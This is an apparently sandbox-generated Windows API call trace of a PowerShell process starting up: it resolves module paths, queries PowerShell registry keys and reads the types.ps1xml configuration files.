	[0140.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0140.051] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.051] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0140.051] CoTaskMemFree (pv=0x23f020) 
	[0140.053] CoTaskMemAlloc (cb=0xcc) returned 0x1b824cc0
	[0140.053] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b824cc0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0140.053] CoTaskMemFree (pv=0x1b824cc0) 
	[0140.053] CoTaskMemAlloc (cb=0xf0) returned 0x1b8013b0
	[0140.053] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8013b0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0140.053] CoTaskMemFree (pv=0x1b8013b0) 
	[0140.053] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x340) returned 0x0
	[0140.054] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd60c, lpData=0x0, lpcbData=0x1cd608*=0x0 | out: lpType=0x1cd60c*=0x2, lpData=0x0, lpcbData=0x1cd608*=0x6c) returned 0x0
	[0140.054] CoTaskMemAlloc (cb=0x70) returned 0x27d180
	[0140.054] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd5dc, lpData=0x27d180, lpcbData=0x1cd5d8*=0x6c | out: lpType=0x1cd5dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd5d8*=0x6c) returned 0x0
	[0140.054] CoTaskMemFree (pv=0x27d180) 
	[0140.054] CoTaskMemAlloc (cb=0xcc) returned 0x1b824cc0
	[0140.054] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b824cc0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0140.054] CoTaskMemFree (pv=0x1b824cc0) 
	[0140.054] CoTaskMemAlloc (cb=0xcc) returned 0x1b824cc0
	[0140.054] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b824cc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0140.054] CoTaskMemFree (pv=0x1b824cc0) 
	[0140.152] RegCloseKey (hKey=0x340) returned 0x0
	[0140.153] CoTaskMemAlloc (cb=0xcc) returned 0x1b824cc0
	[0140.153] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b824cc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0140.153] CoTaskMemFree (pv=0x1b824cc0) 
	[0140.153] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x340) returned 0x0
	[0140.153] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd60c, lpData=0x0, lpcbData=0x1cd608*=0x0 | out: lpType=0x1cd60c*=0x0, lpData=0x0, lpcbData=0x1cd608*=0x0) returned 0x2
	[0140.153] RegCloseKey (hKey=0x340) returned 0x0
	[0140.166] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.166] CoTaskMemFree (pv=0x23f020) 
	[0140.169] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.169] CoTaskMemFree (pv=0x23f020) 
	[0140.174] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.174] CoTaskMemFree (pv=0x23f020) 
	[0140.174] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.174] CoTaskMemFree (pv=0x23f020) 
	[0140.176] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd478 | out: phkResult=0x1cd478*=0x340) returned 0x0
	[0140.177] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x1cd48c, lpData=0x0, lpcbData=0x1cd488*=0x0 | out: lpType=0x1cd48c*=0x1, lpData=0x0, lpcbData=0x1cd488*=0x74) returned 0x0
	[0140.179] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x1cd3fc, lpData=0x0, lpcbData=0x1cd3f8*=0x0 | out: lpType=0x1cd3fc*=0x1, lpData=0x0, lpcbData=0x1cd3f8*=0x74) returned 0x0
	[0140.179] CoTaskMemAlloc (cb=0x78) returned 0x27d180
	[0140.179] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x1cd3cc, lpData=0x27d180, lpcbData=0x1cd3c8*=0x74 | out: lpType=0x1cd3cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd3c8*=0x74) returned 0x0
	[0140.179] CoTaskMemFree (pv=0x27d180) 
	[0140.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0140.179] SetErrorMode (uMode=0x1) returned 0x1
	[0140.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd350 | out: lpFileInformation=0x1cd350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0140.180] SetErrorMode (uMode=0x1) returned 0x1
	[0140.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.183] SetErrorMode (uMode=0x1) returned 0x1
	[0140.183] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd350 | out: lpFileInformation=0x1cd350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0140.183] SetErrorMode (uMode=0x1) returned 0x1
	[0140.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.186] SetErrorMode (uMode=0x1) returned 0x1
	[0140.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd350 | out: lpFileInformation=0x1cd350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0140.186] SetErrorMode (uMode=0x1) returned 0x1
	[0140.190] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.190] CoTaskMemFree (pv=0x23f020) 
	[0140.308] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0140.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.308] CoTaskMemFree (pv=0x23f020) 
	[0140.310] GetACP () returned 0x4e4
	[0140.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.334] SetErrorMode (uMode=0x1) returned 0x1
	[0140.336] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0140.337] GetFileType (hFile=0x348) returned 0x1
	[0140.337] SetErrorMode (uMode=0x1) returned 0x1
	[0140.337] GetFileType (hFile=0x348) returned 0x1
	[0140.342] ReadFile (in: hFile=0x348, lpBuffer=0x2d810e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2d810e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.345] ReadFile (in: hFile=0x348, lpBuffer=0x2d810e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2d810e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.346] ReadFile (in: hFile=0x348, lpBuffer=0x2d810e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2d810e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.346] ReadFile (in: hFile=0x348, lpBuffer=0x2d810e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2d810e8*, lpNumberOfBytesRead=0x1cd288*=0xcf3, lpOverlapped=0x0) returned 1
	[0140.347] ReadFile (in: hFile=0x348, lpBuffer=0x2d80543, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2d80543*, lpNumberOfBytesRead=0x1cd288*=0x0, lpOverlapped=0x0) returned 1
	[0140.347] ReadFile (in: hFile=0x348, lpBuffer=0x2d810e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2d810e8*, lpNumberOfBytesRead=0x1cd288*=0x0, lpOverlapped=0x0) returned 1
	[0140.350] CloseHandle (hObject=0x348) returned 1
	[0140.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.412] SetErrorMode (uMode=0x1) returned 0x1
	[0140.412] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd200 | out: lpFileInformation=0x1cd200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0140.412] SetErrorMode (uMode=0x1) returned 0x1
	[0140.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.413] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2e8 | out: phkResult=0x1cd2e8*=0x348) returned 0x0
	[0140.414] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd26c, lpData=0x0, lpcbData=0x1cd268*=0x0 | out: lpType=0x1cd26c*=0x1, lpData=0x0, lpcbData=0x1cd268*=0x56) returned 0x0
	[0140.414] CoTaskMemAlloc (cb=0x5a) returned 0x2ed870
	[0140.414] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd23c, lpData=0x2ed870, lpcbData=0x1cd238*=0x56 | out: lpType=0x1cd23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd238*=0x56) returned 0x0
	[0140.414] CoTaskMemFree (pv=0x2ed870) 
	[0140.414] RegCloseKey (hKey=0x348) returned 0x0
	[0140.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.543] GetSystemInfo (in: lpSystemInfo=0x1cbf20 | out: lpSystemInfo=0x1cbf20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0140.543] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0140.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.794] SetErrorMode (uMode=0x1) returned 0x1
	[0140.794] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0140.794] GetFileType (hFile=0x348) returned 0x1
	[0140.794] SetErrorMode (uMode=0x1) returned 0x1
	[0140.794] GetFileType (hFile=0x348) returned 0x1
	[0140.794] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.794] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.795] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.795] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.795] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.795] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.795] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.795] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.796] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.797] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.797] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.797] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.797] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.797] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.798] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.798] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.798] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.800] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.800] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.800] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.801] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.801] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.801] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.801] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.802] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.802] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.802] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.802] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.803] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.803] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
